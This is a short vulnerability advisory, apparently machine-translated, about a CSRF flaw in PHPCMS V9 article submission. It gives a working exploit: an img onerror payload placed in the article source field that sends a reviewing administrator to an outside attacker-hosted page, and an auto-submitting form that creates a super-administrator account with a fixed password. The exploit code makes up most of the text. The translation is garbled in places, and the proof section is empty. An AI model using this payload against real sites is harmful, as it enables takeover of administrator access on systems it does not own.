PHPCMS V9 article submission CSRF vulnerability-vulnerability warning-the black bar safety net

2013-04-11T00:00:00
ID MYHACK58:62201338255
Type myhack58
Reporter 佚名
Modified 2013-04-11T00:00:00

Description

CSRF can lead to add back the administrator account.

!

In Member center, article submission, in source fill in:

<img src="a" onerror="location. href='http://tenzy.cn/0day/phpcms_v9_csrf_add_admin.php'">

Exploit code:

<form name="myform" action="index. php? m=admin&c=admin_manage&a=add&pc_hash=" method="post" id="myform"> <input type="text" name="info[username]" class="input-text" id="username" value="tenzy" ></input> <input type="password" name="info[password]" class="input-text" id="password" value="1 2 3 4 5 6"></input> <input type="password" name="info[pwdconfirm]" class="input-text" id="pwdconfirm" value="1 2 3 4 5 6"></input> <input type="text" name="info[email]" value="tenzy@live.cn" class="input-text" id="email" size="3 0" ></input> <input type="text" name="info[realname]" value="tenzy" class="input-text" id="realname"></input> <select name="info[roleid]"> <option value="1" >Super administrator</option> </select> <input name="dosubmit" type="text" value="yes" > </form> the <script>myform. submit()</script>

If the administrator in the background of the audit, it will trigger JS that leads to add in Admin.

!

!

Vulnerability proof:

!